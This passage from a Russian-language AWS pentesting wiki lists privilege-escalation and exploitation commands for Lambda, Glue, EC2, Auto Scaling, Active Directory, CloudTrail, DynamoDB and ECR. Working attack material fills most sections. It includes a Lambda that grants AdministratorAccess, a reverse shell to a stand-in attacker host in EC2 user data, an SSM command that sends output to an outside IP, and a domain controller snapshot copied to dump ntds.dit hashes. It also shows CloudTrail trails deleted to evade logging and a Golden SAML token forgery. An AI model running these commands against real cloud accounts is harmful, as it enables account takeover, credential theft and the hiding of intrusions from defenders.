Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

https://aws.amazon.com/ru/augmented-ai/

== CodeGuru ==

https://aws.amazon.com/ru/codeguru/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

